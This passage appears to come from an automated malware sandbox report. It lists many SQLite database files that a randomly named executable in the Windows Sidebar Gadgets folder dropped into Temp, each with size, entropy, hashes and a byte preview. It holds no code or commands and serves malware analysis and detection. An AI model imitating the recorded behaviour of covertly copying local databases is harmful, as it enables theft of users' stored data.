                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\guO3eMRa9T

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hBgw5CAiWC

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hNb5hNYf66

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hR8qFYoJHH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\i11YRcIMsc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iPHRLo8x3J

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iR4hYlyE95

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iUC27NFgLQ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iYEnBLwume

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ijwjVdLJvZ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iwuWqMFkSv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\j4067nYHj3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\j54VC6eaJL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\jfXqE8MhWx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\jt89c9YNwa

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\k6bMXltQsV

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kD6JP1FzCT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kSlzwsfJuo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kUEWD4DCKB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kjEaURsFA1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
